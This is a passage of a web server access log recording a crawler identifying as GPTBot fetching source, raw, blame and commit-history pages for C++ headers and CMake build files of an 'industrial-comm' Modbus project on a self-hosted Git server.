"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10240] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10084] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 9934] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10435] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 789] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" [Client 74.7.227.38] [Length 9930] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" -[17/Feb/2026:15:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" [Client 74.7.227.38] [Length 13486] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" -[17/Feb/2026:15:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" -[17/Feb/2026:15:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" -[17/Feb/2026:15:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" [Client 74.7.227.38] [Length 12304] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" -[17/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10729] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 322] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12776] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12016] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12362] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 11567] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 11610] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13132] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10171] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1643] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10820] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12704] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11318] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13576] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 9933] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11900] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12943] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12360] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 